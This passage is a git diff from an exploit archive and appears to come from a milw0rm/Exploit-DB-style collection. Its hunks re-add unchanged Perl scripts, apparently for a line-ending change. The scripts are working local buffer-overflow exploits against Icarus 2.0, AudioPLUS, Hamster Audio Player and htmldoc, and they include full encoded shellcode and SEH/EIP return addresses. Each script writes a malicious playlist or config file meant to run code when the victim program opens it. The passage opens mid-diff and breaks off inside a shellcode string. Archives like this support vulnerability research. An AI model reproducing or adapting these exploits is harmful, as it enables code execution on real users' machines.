-#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
-#											     #
-#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
-# Note : The shellcode is encoded with Alpha2 . The program don't accept non-encoded 	     #
-# Shellcode . I'm too lazy to figure that out now , i you find something contact me !	     #
-#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
-
-
-$Header="server=" ;
-$junk="\x41" x 528;
-$EIP = "\x28\x55\x3D\x72"; # 0x723D5528 -- DSOUND.DLL -- CALL ESP
-$NOPS = "\x90" x 20 ;
-# win32_exec -  EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
-$shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49".
-"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a".
-"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x5a\x41\x42\x32\x42\x41\x32".
-"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x78\x69\x79\x6c\x4b".
-"\x58\x71\x54\x53\x30\x65\x50\x35\x50\x4e\x6b\x33\x75\x67\x4c\x6e".
-"\x6b\x51\x6c\x33\x35\x50\x78\x66\x61\x5a\x4f\x6e\x6b\x50\x4f\x32".
-"\x38\x6c\x4b\x33\x6f\x41\x30\x35\x51\x48\x6b\x37\x39\x6c\x4b\x45".
-"\x64\x6e\x6b\x56\x61\x7a\x4e\x56\x51\x6f\x30\x4c\x59\x4e\x4c\x4b".
-"\x34\x4f\x30\x50\x74\x57\x77\x48\x41\x39\x5a\x76\x6d\x33\x31\x79".
-"\x52\x6a\x4b\x6b\x44\x37\x4b\x42\x74\x74\x64\x55\x54\x50\x75\x6b".
-"\x55\x4c\x4b\x61\x4f\x67\x54\x46\x61\x6a\x4b\x52\x46\x6e\x6b\x74".
-"\x4c\x50\x4b\x4c\x4b\x53\x6f\x45\x4c\x76\x61\x38\x6b\x6e\x6b\x77".
-"\x6c\x6c\x4b\x75\x51\x38\x6b\x6f\x79\x61\x4c\x54\x64\x75\x54\x6b".
-"\x73\x56\x51\x4f\x30\x33\x54\x6e\x6b\x53\x70\x36\x50\x4c\x45\x6f".
-"\x30\x53\x48\x54\x4c\x4c\x4b\x71\x50\x66\x6c\x6c\x4b\x32\x50\x47".
-"\x6c\x6e\x4d\x4c\x4b\x70\x68\x45\x58\x7a\x4b\x77\x79\x4c\x4b\x6f".
-"\x70\x4c\x70\x67\x70\x35\x50\x37\x70\x4c\x4b\x43\x58\x77\x4c\x43".
-"\x6f\x74\x71\x59\x66\x63\x50\x42\x76\x6c\x49\x6a\x58\x4d\x53\x59".
-"\x50\x61\x6b\x50\x50\x71\x78\x63\x4e\x48\x58\x39\x72\x51\x63\x32".
-"\x48\x4f\x68\x4b\x4e\x6e\x6a\x46\x6e\x61\x47\x4b\x4f\x6a\x47\x73".
-"\x53\x62\x41\x42\x4c\x55\x33\x67\x70\x4a";
-#
-#
-#
-open(myfile,'>>GUEST.ICP');
-print myfile $Header.$junk.$EIP.$NOPS.$shellcode;
-
-#----------------------------------------------------------------------------------#
-# Welcome back Milw0rm & tnx to str0ke for his great j0b !!!11111oneleven11!!
-#----------------------------------------------------------------------------------#
-
-# milw0rm.com [2009-07-14]
+#!/usr/bin/perl
+#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
+# Icarus 2.0  Local Stack-based Buffer overflow Exploit             			     #
+# By : [0]x80->[H]4x²0r									     #
+# Contact : hashteck[at]Gmail[dot]com						             #
+# From : Morocco									     #
+# PoC by : ThE g0bL!N									     #
+#[+]--------------------------------------------------------------------------------------[+]#
+# Program : Icarus 2.0  								     #
+#[+]--------------------------------------------------------------------------------------[+]#
+# Tested Under Win$hit 6.0 Vista Pro							     #
+#[+]--------------------------------------------------------------------------------------[+]#
+##############################################################################################
+#####################################  Proud to be HACKER  ###################################
+##############################################################################################
+#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
+#											     #
+#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
+# Put the file generated by this exploit in Icarus Directory ( After you made a back up of   #
+# the original file ) then launch Icarus.exe and b000m , calc.exe is launched                #
+#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
+#											     #
+#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
+# Note : The shellcode is encoded with Alpha2 . The program don't accept non-encoded 	     #
+# Shellcode . I'm too lazy to figure that out now , i you find something contact me !	     #
+#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
+
+
+$Header="server=" ;
+$junk="\x41" x 528;
+$EIP = "\x28\x55\x3D\x72"; # 0x723D5528 -- DSOUND.DLL -- CALL ESP
+$NOPS = "\x90" x 20 ;
+# win32_exec -  EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
+$shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49".
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a".
+"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x5a\x41\x42\x32\x42\x41\x32".
+"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x78\x69\x79\x6c\x4b".
+"\x58\x71\x54\x53\x30\x65\x50\x35\x50\x4e\x6b\x33\x75\x67\x4c\x6e".
+"\x6b\x51\x6c\x33\x35\x50\x78\x66\x61\x5a\x4f\x6e\x6b\x50\x4f\x32".
+"\x38\x6c\x4b\x33\x6f\x41\x30\x35\x51\x48\x6b\x37\x39\x6c\x4b\x45".
+"\x64\x6e\x6b\x56\x61\x7a\x4e\x56\x51\x6f\x30\x4c\x59\x4e\x4c\x4b".
+"\x34\x4f\x30\x50\x74\x57\x77\x48\x41\x39\x5a\x76\x6d\x33\x31\x79".
+"\x52\x6a\x4b\x6b\x44\x37\x4b\x42\x74\x74\x64\x55\x54\x50\x75\x6b".
+"\x55\x4c\x4b\x61\x4f\x67\x54\x46\x61\x6a\x4b\x52\x46\x6e\x6b\x74".
+"\x4c\x50\x4b\x4c\x4b\x53\x6f\x45\x4c\x76\x61\x38\x6b\x6e\x6b\x77".
+"\x6c\x6c\x4b\x75\x51\x38\x6b\x6f\x79\x61\x4c\x54\x64\x75\x54\x6b".
+"\x73\x56\x51\x4f\x30\x33\x54\x6e\x6b\x53\x70\x36\x50\x4c\x45\x6f".
+"\x30\x53\x48\x54\x4c\x4c\x4b\x71\x50\x66\x6c\x6c\x4b\x32\x50\x47".
+"\x6c\x6e\x4d\x4c\x4b\x70\x68\x45\x58\x7a\x4b\x77\x79\x4c\x4b\x6f".
+"\x70\x4c\x70\x67\x70\x35\x50\x37\x70\x4c\x4b\x43\x58\x77\x4c\x43".
+"\x6f\x74\x71\x59\x66\x63\x50\x42\x76\x6c\x49\x6a\x58\x4d\x53\x59".
+"\x50\x61\x6b\x50\x50\x71\x78\x63\x4e\x48\x58\x39\x72\x51\x63\x32".
+"\x48\x4f\x68\x4b\x4e\x6e\x6a\x46\x6e\x61\x47\x4b\x4f\x6a\x47\x73".
+"\x53\x62\x41\x42\x4c\x55\x33\x67\x70\x4a";
+#
+#
+#
+open(myfile,'>>GUEST.ICP');
+print myfile $Header.$junk.$EIP.$NOPS.$shellcode;
+
+#----------------------------------------------------------------------------------#
+# Welcome back Milw0rm & tnx to str0ke for his great j0b !!!11111oneleven11!!
+#----------------------------------------------------------------------------------#
+
+# milw0rm.com [2009-07-14]
diff --git a/platforms/windows/local/9149.pl b/platforms/windows/local/9149.pl
index 26bd27968..3265c258b 100755
--- a/platforms/windows/local/9149.pl
+++ b/platforms/windows/local/9149.pl
@@ -1,45 +1,45 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# Icarus 2.0 (.ICP File) Local buffer Overflow (seh)
-# # Greetz to all my friends
-# form egypt
-## easy :d ###PoC by : ThE g0bL!N    
-## this work sooooooooo good
-## USAGE put the file GUEST.ICP in Icarus Directory
-## Tested on: Windows XP Pro SP2 (EN)
-################################################################
-my $bof="\x41" x 18204;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\xb8\x15\xd1\x72";
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> GUEST.ICP');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-07-15]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# Icarus 2.0 (.ICP File) Local buffer Overflow (seh)
+# # Greetz to all my friends
+# form egypt
+## easy :d ###PoC by : ThE g0bL!N    
+## this work sooooooooo good
+## USAGE put the file GUEST.ICP in Icarus Directory
+## Tested on: Windows XP Pro SP2 (EN)
+################################################################
+my $bof="\x41" x 18204;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\xb8\x15\xd1\x72";
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> GUEST.ICP');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-07-15]
diff --git a/platforms/windows/local/9152.pl b/platforms/windows/local/9152.pl
index 343455e6a..e1a7daeef 100755
--- a/platforms/windows/local/9152.pl
+++ b/platforms/windows/local/9152.pl
@@ -1,41 +1,41 @@
-#!/usr/bin/perl
-# AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit
-# first exploiter hack4love http://www.milw0rm.com/exploits/9064
-# and this the universal for .lst .m3u extention
-# Big Thnx to his0ka my best freind :d
-# Stack
-print "AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit\n";
-my $shellcode=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-my $payload =  "Ma".
-                "\x41" x (4099-length($shellcode)).
-                "$shellcode".
-                "\xE8\xF8\xEF\xFF\xFF".
-                "\x41" x 10 .
-                "\xEB\xEF\xFF\xFF".
-                "\xA4\x29\x40\x00"; #univ ret
-print $payload;
-# usage perl exploit.pl  >>exploit.m3u
-
-# milw0rm.com [2009-07-15]
+#!/usr/bin/perl
+# AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit
+# first exploiter hack4love http://www.milw0rm.com/exploits/9064
+# and this the universal for .lst .m3u extention
+# Big Thnx to his0ka my best freind :d
+# Stack
+print "AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit\n";
+my $shellcode=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+my $payload =  "Ma".
+                "\x41" x (4099-length($shellcode)).
+                "$shellcode".
+                "\xE8\xF8\xEF\xFF\xFF".
+                "\x41" x 10 .
+                "\xEB\xEF\xFF\xFF".
+                "\xA4\x29\x40\x00"; #univ ret
+print $payload;
+# usage perl exploit.pl  >>exploit.m3u
+
+# milw0rm.com [2009-07-15]
diff --git a/platforms/windows/local/9172.pl b/platforms/windows/local/9172.pl
index 7a7784105..f58b03972 100755
--- a/platforms/windows/local/9172.pl
+++ b/platforms/windows/local/9172.pl
@@ -1,39 +1,39 @@
-#!/usr/bin/perl
-#[+] Bug : Hamster Audio Player 0.3a Universal BOF Exploit (SEH)
-#[+] Author : ThE g0bL!N
-#[+] Greetz to all my friends
-#[+] Tested on: Windows XP Pro SP2 (Fr)
-##[+] Big thnx: His0k4
-##########################################################
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $junk="\x41" x (4103-length($shellcode));
-my $jmp="\xE9\xF4\xEF\xFF\xFF";
-my $next_seh="\xEB\xF9\x41\x42";
-my $seh="\x0F\x39\x42\x00";
-open(myfile,'>>exploit.m3u');#/hpl
-print myfile $shellcode.$junk.$jmp.$next_seh.$seh;
-
-# milw0rm.com [2009-07-16]
+#!/usr/bin/perl
+#[+] Bug : Hamster Audio Player 0.3a Universal BOF Exploit (SEH)
+#[+] Author : ThE g0bL!N
+#[+] Greetz to all my friends
+#[+] Tested on: Windows XP Pro SP2 (Fr)
+##[+] Big thnx: His0k4
+##########################################################
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $junk="\x41" x (4103-length($shellcode));
+my $jmp="\xE9\xF4\xEF\xFF\xFF";
+my $next_seh="\xEB\xF9\x41\x42";
+my $seh="\x0F\x39\x42\x00";
+open(myfile,'>>exploit.m3u');#/hpl
+print myfile $shellcode.$junk.$jmp.$next_seh.$seh;
+
+# milw0rm.com [2009-07-16]
diff --git a/platforms/windows/local/918.c b/platforms/windows/local/918.c
index 61f941e59..bc9e9e863 100755
--- a/platforms/windows/local/918.c
+++ b/platforms/windows/local/918.c
@@ -145,6 +145,6 @@ int main()
        printf("Ftp Password  : %s\n",FtpPassword);
 
        return 0;
-}
-
-// milw0rm.com [2005-04-06]
+}
+
+// milw0rm.com [2005-04-06]
diff --git a/platforms/windows/local/919.c b/platforms/windows/local/919.c
index bfa940591..c94775c93 100755
--- a/platforms/windows/local/919.c
+++ b/platforms/windows/local/919.c
@@ -75,6 +75,6 @@ FileFinder\\GnutellaServer",
         }
 
        return 0;
-}
-
-// milw0rm.com [2005-04-07]
+}
+
+// milw0rm.com [2005-04-07]
diff --git a/platforms/windows/local/9190.pl b/platforms/windows/local/9190.pl
index 610058038..0b4d8785d 100755
--- a/platforms/windows/local/9190.pl
+++ b/platforms/windows/local/9190.pl
@@ -1,52 +1,52 @@
-#!/usr/bin/perl
-# htmldoc 1.8.27.1 (.html) Universal Stack Overflow Exploit
-# http://en.securitylab.ru/poc/extra/382563.php >> Bufferoverflow POC
-# By ksa04
-# j-7[at]hotmail[dot]com
-# From Kingdom of Saudi Arabia
-#[+]--------------------------------------------------------------------------------------[+]#
-# program : HTMLDOC
-# version : all versions (tested 1.8.27.1 and 1.8.27 and 1.8.24)
-# website program : http://www.htmldoc.org 
-# Download : http://www.easysw.com/htmldoc/software.php
-# Tested Under Windows XP SP3
-# NOTE : launching from directory >> htmldoc -f lol.pdf exploit.html
-# or launching HTMLDOC.exe >> add file >> Document type (wEb page or continuous) >>
-# put any thing in Output >> Generate 
-#[+]--------------------------------------------------------------------------------------[+]#
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode = 
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
